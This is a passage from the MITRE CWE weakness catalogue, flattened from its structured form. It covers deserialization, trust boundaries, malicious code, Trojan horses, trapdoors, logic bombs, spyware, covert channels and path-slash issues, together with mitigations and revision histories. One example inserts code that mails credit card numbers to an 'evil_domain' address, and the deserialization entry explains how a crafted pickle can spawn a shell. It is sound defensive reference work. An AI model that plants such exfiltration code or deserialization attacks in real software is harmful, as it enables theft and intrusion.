MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - Path Issue - Multiple Leading Slash - //multiple/leading/slash - - - - An object contains a public static field that is not marked final, which might allow it to be modified in unexpected ways. - Public static variables can be read without an accessor and changed without a mutator by any classes in the application. - - - - - - - - - When a field is declared public but not final, the field can be read and written to by arbitrary Java code. - - - - Implementation - - - High - - - Integrity - Modify Application Data - The object could potentially be tampered with. - - - Confidentiality - Read Application Data - The object could potentially allow the object to be read. - - - - - Architecture and Design - Clearly identify the scope for all critical data elements, including whether they should be regarded as static. - - - Implementation - - Make any static fields private and constant. - A constant field is denoted by the keyword 'const' in C/C++ and ' final' in Java - - - - - - The following examples use of a public static String variable to contain the name of a property/configuration file for the application. - - class SomeAppClass { - - public:static string appPropertiesConfigFile = "app/properties.config"; - ... - } - - - public class SomeAppClass { - - public static String appPropertiesFile = "app/Application.properties";... - } - - Having a public static variable that is not marked final (constant) may allow the variable to the altered in a way not intended by the application. In this example the String variable can be modified to indicate a different on nonexistent properties file which could cause the application to crash or caused unexpected behavior. - - class SomeAppClass { - - public:static const string appPropertiesConfigFile = "app/properties.config"; - ... - } - - - public class SomeAppClass { - - public static final String appPropertiesFile = "app/Application.properties";... - } - - - - - - Overflow of static internal buffer - - - OBJ10-J - Do not use public static nonfinal variables - - - SFP28 - Unexpected access points - - - - - - - - CLASP - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - KDM Analytics - 2008-08-01 - added/updated white box definitions - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-11-05 - Significant clarification of this entry, and improved examples. - - - CWE Content Team - MITRE - 2008-11-24 - updated Background_Details, Demonstrative_Examples, Description, Name, Other_Notes, Potential_Mitigations - - - CWE Content Team - MITRE - 2009-05-27 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-10-30 - updated Demonstrative_Examples, Description, Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated White_Box_Definitions - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships - - Overflow of Static Internal Buffer - Static Field Not Marked Final - - - - The product mixes trusted and untrusted data in the same data structure or structured message. - A trust boundary can be thought of as line drawn through a program. On one side of the line, data is untrusted. On the other side of the line, data is assumed to be trustworthy. The purpose of validation logic is to allow data to safely cross the trust boundary - to move from untrusted to trusted. A trust boundary violation occurs when a program blurs the line between what is trusted and what is untrusted. By combining trusted and untrusted data in the same data structure, it becomes easier for programmers to mistakenly trust unvalidated data. - - - - - - - - - Architecture and Design - - - - - Access Control - Bypass Protection Mechanism - - - - - The following code accepts an HTTP request and stores the username parameter in the HTTP session object before checking to ensure that the user has been authenticated. - - usrname = request.getParameter("usrname");if (session.getAttribute(ATTR_USR) == null) {session.setAttribute(ATTR_USR, usrname);} - - - usrname = request.Item("usrname");if (session.Item(ATTR_USR) == null) {session.Add(ATTR_USR, usrname);} - - Without well-established and maintained trust boundaries, programmers will inevitably lose track of which pieces of data have been validated and which have not. This confusion will eventually allow some data to be used without first being validated. - - - - - Trust Boundary Violation - - - SFP23 - Exposed Data - - - - - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Demonstrative_Example, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-06-23 - updated Description, Other_Notes - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated References - - - - - The application deserializes untrusted data without sufficiently verifying that the resulting data will be valid. - - It is often convenient to serialize objects for communication or to save them for later use. However, deserialized data or code can often be modified without using the provided accessor functions if it does not use cryptography to protect itself. Furthermore, any cryptography would still be client-side security -- which is a dangerous security assumption. - Data that is untrusted can not be trusted to be well-formed. - When developers place no restrictions on "gadget chains," or series of instances and method invocations that can self-execute during the deserialization process (i.e., before the object is returned to the caller), it is sometimes possible for attackers to leverage them to perform unauthorized actions, like generating a shell. - - - - - - - - - - - - - - - Serialization and deserialization refer to the process of taking program-internal object-related data, packaging it in a way that allows the data to be externally stored or transferred ("serialization"), then extracting the serialized data to reconstruct the original object ("deserialization"). - - - - Marshaling, Unmarshaling - Marshaling and unmarshaling are effectively synonyms for serialization and deserialization, respectively. - - - Pickling, Unpickling - In Python, the "pickle" functionality is used to perform serialization and deserialization. - - - PHP Object Injection - Some PHP application researchers use this term when attacking unsafe use of the unserialize() function; but it is also used for CWE-915. - - - - - Architecture and Design - OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. - - - Implementation - - - Medium - - - Integrity - Modify Application Data - Unexpected State - Attackers can modify unexpected objects or data that was assumed to be safe from modification. - - - Availability - DoS: Resource Consumption (CPU) - If a function is making an assumption on when to terminate, based on a sentry in a string, it could easily never terminate. - - - Other - Varies by Context - The consequences can vary widely, because it depends on which objects or methods are being deserialized, and how they are used. Making an assumption that the code in the deserialized object is valid is dangerous and can enable exploitation. - - - - - Architecture and Design - Implementation - If available, use the signing/sealing features of the programming language to assure that deserialized data has not been tainted. For example, a hash-based message authentication code (HMAC) could be used to ensure that data has not been modified. - - - Implementation - When deserializing data, populate a new object rather than just deserializing. The result is that the data flows through safe input validation and that the functions are safe. - - - Implementation - Explicitly define a final object() to prevent deserialization. - - - Architecture and Design - Implementation - - Make fields transient to protect them from deserialization. - An attempt to serialize and then deserialize a class containing transient fields will result in NULLs where the transient data should be. This is an excellent way to prevent time, environment-based, or sensitive variables from being carried over and used improperly. - - - - Implementation - Avoid having unnecessary types or gadgets available that can be leveraged for malicious ends. This limits the potential for unintended or unauthorized types and gadgets to be leveraged by the attacker. Add only acceptable classes to an allowlist. Note: new gadgets are constantly being discovered, so this alone is not a sufficient mitigation. - - - - - This code snippet deserializes an object from a file and uses it as a UI button: - - try {File file = new File("object.obj");ObjectInputStream in = new ObjectInputStream(new FileInputStream(file));javax.swing.JButton button = (javax.swing.JButton) in.readObject();in.close();} - - This code does not attempt to verify the source or contents of the file before deserializing it. An attacker may be able to replace the intended file with a file that contains arbitrary malicious code which will be executed when the button is pressed. - To mitigate this, explicitly define final readObject() to prevent deserialization. An example of this is: - - private final void readObject(ObjectInputStream in) throws java.io.IOException {throw new java.io.IOException("Cannot be deserialized"); } - - - - In Python, the Pickle library handles the serialization and deserialization processes. In this example derived from [REF-467], the code receives and parses data, and afterwards tries to authenticate a user based on validating a token. - - try { - class ExampleProtocol(protocol.Protocol):def dataReceived(self, data): - # Code that would be here would parse the incoming data# After receiving headers, call confirmAuth() to authenticate - def confirmAuth(self, headers):try:token = cPickle.loads(base64.b64decode(headers['AuthToken']))if not check_hmac(token['signature'], token['data'], getSecretKey()):raise AuthFailself.secure_data = token['data']except:raise AuthFail - } - - Unfortunately, the code does not verify that the incoming data is legitimate. An attacker can construct a illegitimate, serialized object "AuthToken" that instantiates one of Python's subprocesses to execute arbitrary commands. For instance,the attacker could construct a pickle that leverages Python's subprocess module, which spawns new processes and includes a number of arguments for various uses. Since Pickle allows objects to define the process for how they should be unpickled, the attacker can direct the unpickle process to call Popen in the subprocess module and execute /bin/sh. - - - - - CVE-2019-12799 - chain: bypass of untrusted deserialization issue (CWE-502) by using an assumed-trusted class (CWE-183) - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12799 - - - CVE-2015-8103 - Deserialization issue in commonly-used Java library allows remote execution. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8103 - - - CVE-2015-4852 - Deserialization issue in commonly-used Java library allows remote execution. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4852 - - - CVE-2013-1465 - Use of PHP unserialize function on untrusted input allows attacker to modify application configuration. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1465 - - - CVE-2012-3527 - Use of PHP unserialize function on untrusted input in content management system might allow code execution. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3527 - - - CVE-2012-0911 - Use of PHP unserialize function on untrusted input in content management system allows code execution using a crafted cookie value. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0911 - - - CVE-2012-0911 - Content management system written in PHP allows unserialize of arbitrary objects, possibly allowing code execution. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0911 - - - CVE-2011-2520 - Python script allows local users to execute code via pickled data. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2520 - - - CVE-2012-4406 - Unsafe deserialization using pickle in a Python script. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4406 - - - CVE-2003-0791 - Web browser allows execution of native methods via a crafted string to a JavaScript function that deserializes the string. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0791 - - - - - Deserialization of untrusted data - - - SER01-J - Do not deviate from the proper signatures of serialization methods - - - SER03-J - Do not serialize unencrypted, sensitive data - - - SER06-J - Make defensive copies of private mutable components during deserialization - - - SER08-J - Do not use the default serialized form for implementation defined invariants - - - SFP25 - Tainted input to variable - - - - - - - - - - - - - - - - - - The relationships between CWE-502 and CWE-915 need further exploration. CWE-915 is more narrowly scoped to object modification, and is not necessarily used for deserialization. - - - - CLASP - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Description, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-10-29 - updated Description, Other_Notes, Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-10-30 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2013-02-21 - updated Alternate_Terms, Applicable_Platforms, Background_Details, Common_Consequences, Maintenance_Notes, Observed_Examples, Potential_Mitigations, References, Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2015-12-07 - updated Observed_Examples, References, Relationships - - - CWE Content Team - MITRE - 2017-05-03 - updated Applicable_Platforms, Demonstrative_Examples, Description, Potential_Mitigations, References - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Modes_of_Introduction, Potential_Mitigations, References, Relationships - - - CWE Content Team - MITRE - 2018-03-27 - updated Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Related_Attack_Patterns, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-06-20 - updated Type - - - CWE Content Team - MITRE - 2019-09-19 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Observed_Examples, References, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Alternate_Terms, Potential_Mitigations - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - CWE Content Team - MITRE - 2021-07-20 - updated Relationships - - - - - The application contains code that appears to be malicious in nature. - Malicious flaws have acquired colorful names, including Trojan horse, trapdoor, timebomb, and logic-bomb. A developer might insert malicious code with the intent to subvert the security of an application or its host system at some time in the future. It generally refers to a program that performs a useful service but exploits rights of the program's user in a way the user does not intend. - - - - - - Implementation - - - Bundling - - - Distribution - - - Installation - - - - - Confidentiality - Integrity - Availability - Execute Unauthorized Code or Commands - - - - - Manual Static Analysis - Binary or Bytecode - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies - Generated Code Inspection - - - - - SOAR Partial - - - Dynamic Analysis with Manual Results Interpretation - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Automated Monitored Execution - - - - - SOAR Partial - - - Manual Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Manual Source Code Review (not inspections) - - - - - SOAR Partial - - - Automated Static Analysis - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Origin Analysis - - - - - SOAR Partial - - - - - Testing - Remove the malicious code and start an effort to ensure that no more malicious code exists. This may require a detailed review of all code, as it is possible to hide a serious attack in only one or two lines of code. These lines may be located almost anywhere in an application and may have been intentionally obfuscated by the attacker. - - - - - In the example below, a malicous developer has injected code to send credit card numbers to the developer's own email address. - - boolean authorizeCard(String ccn) { - - - // Authorize credit card. - - - ... - - mailCardNumber(ccn, "evil_developer@evil_domain.com"); - } - - - - - - Malicious - - - - The term "Trojan horse" was introduced by Dan Edwards and recorded by James Anderson [18] to characterize a particular computer security threat; it has been redefined many times [4,18-20]. - - - - Landwehr - 2006-07-19 - - - Sean Eidemiller - Cigital - 2008-07-01 - added/updated demonstrative examples - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-10-29 - updated Description, Other_Notes - - - CWE Content Team - MITRE - 2010-09-27 - updated Other_Notes, Terminology_Notes - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2013-02-21 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Detection_Factors - - - CWE Content Team - MITRE - 2017-11-08 - updated Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Time_of_Introduction - - Malicious - - - - The software appears to contain benign or useful functionality, but it also contains code that is hidden from normal operation that violates the intended security policy of the user or the system administrator. - - - - - - Implementation - - - Operation - - - - - Confidentiality - Integrity - Availability - Execute Unauthorized Code or Commands - - - - - Operation - Most antivirus software scans for Trojan Horses. - - - Installation - Verify the integrity of the software that is being installed. - - - - - Trojan Horse - - - - - - - Potentially malicious dynamic code compiled at runtime can conceal any number of attacks that will not appear in the baseline. The use of dynamically compiled code could also allow the injection of attacks on post-deployed applications. - - Definitions of "Trojan horse" and related terms have varied widely over the years, but common usage in 2008 generally refers to software that performs a legitimate function, but also contains malicious code. - Almost any malicious code can be called a Trojan horse, since the author of malicious code needs to disguise it somehow so that it will be invoked by a nonmalicious user (unless the author means also to invoke the code, in which case they presumably already possess the authorization to perform the intended sabotage). A Trojan horse that replicates itself by copying its code into other program files (see case MA1) is commonly referred to as a virus. One that replicates itself by creating new processes or files to contain its code, instead of modifying existing storage entities, is often called a worm. Denning provides a general discussion of these terms; differences of opinion about the term applicable to a particular flaw or its exploitations sometimes occur. - - - - - Landwehr - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description, Terminology_Notes - - - CWE Content Team - MITRE - 2010-02-16 - updated References - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2017-11-08 - updated References, Terminology_Notes - - - CWE Content Team - MITRE - 2018-03-27 - updated References - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - Non-replicating malicious code only resides on the target system or software that is attacked; it does not attempt to spread to other systems. - - - - - - Implementation - - - Operation - - - - - Confidentiality - Integrity - Availability - Execute Unauthorized Code or Commands - - - - - Operation - Antivirus software can help mitigate known malicious code. - - - Installation - Verify the integrity of the software that is being installed. - - - - - Non-Replicating - - - - - Landwehr - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - Non-Replicating - - - - Replicating malicious code, including viruses and worms, will attempt to attack other systems once it has successfully compromised the target system or software. - - - - - - Implementation - - - Operation - - - - - Confidentiality - Integrity - Availability - Execute Unauthorized Code or Commands - - - - - Operation - Antivirus software scans for viruses or worms. - - - Installation - Always verify the integrity of the software that is being installed. - - - - - Replicating (virus) - - - - - Landwehr - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - Replicating (virus) - Replicating Malicious Code (virus) - - - - A software system that accepts path input in the form of multiple internal slash ('/multiple//internal/slash/') without appropriate validation can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files. - - - - - - - - - Implementation - - - - - Confidentiality - Integrity - Read Files or Directories - Modify Files or Directories - - - - - Implementation - Input Validation - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. - - - - - CVE-2002-1483 - Read files with full pathname using multiple internal slash. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1483 - - - - - /multiple//internal/slash ('multiple internal slash') - - - SFP16 - Path Traversal - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - Path Issue - Multiple Internal Slash - /multiple//internal/slash - - - - A trapdoor is a hidden piece of code that responds to a special input, allowing its user access to resources without passing through the normal security enforcement mechanism. - - - - - - Architecture and Design - - - Implementation - - - Operation - - - - - Confidentiality - Integrity - Availability - Access Control - Execute Unauthorized Code or Commands - Bypass Protection Mechanism - - - - - Automated Static Analysis - Binary or Bytecode - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Inter-application Flow Analysis - Binary / Bytecode simple extractor - strings, ELF readers, etc. - - - - - SOAR Partial - - - Manual Static Analysis - Binary or Bytecode - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies - Generated Code Inspection - - - - - SOAR Partial - - - Dynamic Analysis with Manual Results Interpretation - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Automated Monitored Execution - Forced Path Execution - Debugger - Monitored Virtual Environment - run potentially malicious code in sandbox / wrapper / virtual machine, see if it does anything suspicious - - - - - SOAR Partial - - - Manual Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Manual Source Code Review (not inspections) - - - Cost effective for partial coverage: - - - Focused Manual Spotcheck - Focused manual analysis of source - - - - - High - - - Automated Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Context-configured Source Code Weakness Analyzer - - - - - SOAR Partial - - - Architecture or Design Review - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) - - - Cost effective for partial coverage: - - - Formal Methods / Correct-By-Construction - - - - - High - - - - - Installation - Always verify the integrity of the software that is being installed. - - - Testing - Identify and closely inspect the conditions for entering privileged areas of the code, especially those related to authentication, process invocation, and network communications. - - - - - Trapdoor - - - - - Landwehr - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Detection_Factors - - - CWE Content Team - MITRE - 2017-05-03 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2020-02-24 - updated Detection_Factors, Relationships - - - - - The software contains code that is designed to disrupt the legitimate operation of the software (or its environment) when a certain time passes, or when a certain logical condition is met. - When the time bomb or logic bomb is detonated, it may perform a denial of service such as crashing the system, deleting critical data, or degrading system response time. This bomb might be placed within either a replicating or non-replicating Trojan horse. - - - - - - - - - - Architecture and Design - - - Implementation - - - - - Other - Integrity - Varies by Context - Alter Execution Logic - - - - - Installation - Always verify the integrity of the software that is being installed. - - - Testing - Conduct a code coverage analysis using live testing, then closely inspect any code that is not covered. - - - - - Typical examples of triggers include system date or time mechanisms, random number generators, and counters that wait for an opportunity to launch their payload. When triggered, a time-bomb may deny service by crashing the system, deleting files, or degrading system response-time. - - - - - Logic/Time Bomb - - - - - - - - Landwehr - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2013-02-21 - updated Applicable_Platforms, Potential_Mitigations, References, Time_of_Introduction - - - CWE Content Team - MITRE - 2017-11-08 - updated References - - - CWE Content Team - MITRE - 2020-02-24 - updated Applicable_Platforms, Relationships - - - - - The software collects personally identifiable information about a human user or the user's activities, but the software accesses this information using other resources besides itself, and it does not require that user's explicit approval or direct input into the software. - "Spyware" is a commonly used term with many definitions and interpretations. In general, it is meant to software that collects information or installs functionality that human users might not allow if they were fully aware of the actions being taken by the software. For example, a user might expect that tax software would collect a social security number and include it when filing a tax return, but that same user would not expect gaming software to obtain the social security number from that tax software's data. - - - - - - Architecture and Design - - - Implementation - - - Operation - - - - - Confidentiality - Read Application Data - - - - - Operation - Use spyware detection and removal software. - - - Installation - Always verify the integrity of the software that is being installed. - - - - - CWE Community - 2006-07-19 - Submitted by members of the CWE community to extend early CWE versions - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships - - - CWE Content Team - MITRE - 2008-10-14 - updated Description, Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - A covert channel is a path that can be used to transfer information in a way not intended by the system's designers. - Typically the system has not given authorization for the transmission and has no knowledge of its occurrence. - - - - - - Implementation - - - Operation - - - - - Confidentiality - Access Control - Read Application Data - Bypass Protection Mechanism - - - - - Architecture or Design Review - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) - - - - - SOAR Partial - - - - - Covert Channel - - - - - - - A covert channel can be thought of as an emergent resource, meaning that it was not an originally intended resource, however it exists due the application's behaviors. - - - - Landwehr - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description, Other_Notes, Theoretical_Notes - - - CWE Content Team - MITRE - 2009-07-27 - updated Relationships - - - CWE Content Team - MITRE - 2010-04-05 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2013-02-21 - updated Description, Relationships, Theoretical_Notes - - - CWE Content Team - MITRE - 2014-06-23 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2014-07-30 - updated Detection_Factors, Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - A covert storage channel transfers information through the setting of bits by one program and the reading of those bits by another. What distinguishes this case from that of ordinary operation is that the bits are used to convey encoded information. - Covert storage channels occur when out-of-band data is stored in messages for the purpose of memory reuse. Covert channels are frequently classified as either storage or timing channels. Examples would include using a file intended to hold only audit information to convey user passwords--using the name of a file or perhaps status bits associated with it that can be read by all users to signal the contents of the file. Steganography, concealing information in such a manner that no one but the intended recipient knows of the existence of the message, is a good example of a covert storage channel. - - - - - - Implementation - - - High - - - Confidentiality - Read Application Data - Covert storage channels may provide attackers with important information about the system in question. - - - Integrity - Confidentiality - Read Application Data - If these messages or packets are sent with unnecessary data contained within, it may tip off malicious listeners as to the process that created the message. With this information, attackers may learn any number of things, including the hardware platform, operating system, or algorithms used by the sender. This information can be of significant value to the user in launching further attacks. - - - - - Implementation - Ensure that all reserved fields are set to zero before messages are sent and that no unnecessary information is included. - - - - - An excellent example of covert storage channels in a well known application is the ICMP error message echoing functionality. Due to ambiguities in the ICMP RFC, many IP implementations use the memory within the packet for storage or calculation. For this reason, certain fields of certain packets -- such as ICMP error packets which echo back parts of received messages -- may contain flaws or extra information which betrays information about the identity of the target operating system. This information is then used to build up evidence to decide the environment of the target. This is the first crucial step in determining if a given system is vulnerable to a particular flaw and what changes must be made to malicious code to mount a successful attack. - - - - - Storage - - - Covert storage channel - - - - - Landwehr - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2009-07-27 - updated Common_Consequences, Description - - - CWE Content Team - MITRE - 2009-10-29 - updated Other_Notes - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - This weakness can be found at CWE-385. - - - Landwehr - 2006-07-19 - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships - - - CWE Content Team - MITRE - 2009-10-29 - updated Relationships - - - CWE Content Team - MITRE - 2021-07-20 - updated Name - - DEPRECATED (Duplicate): Covert Timing Channel - - - - A software system that accepts path input in the form of multiple trailing slash ('/multiple/trailing/slash//') without appropriate validation can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files. - - - - - - - - - - - Implementation - - - - - Confidentiality - Integrity - Read Files or Directories - Modify Files or Directories - - - - - Implementation - Input Validation - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. - - - - - CVE-2002-1078 - Directory listings in web server using multiple trailing slash - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1078 - - - - - /multiple/trailing/slash// ('multiple trailing slash') - - - SFP16 - Path Traversal - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 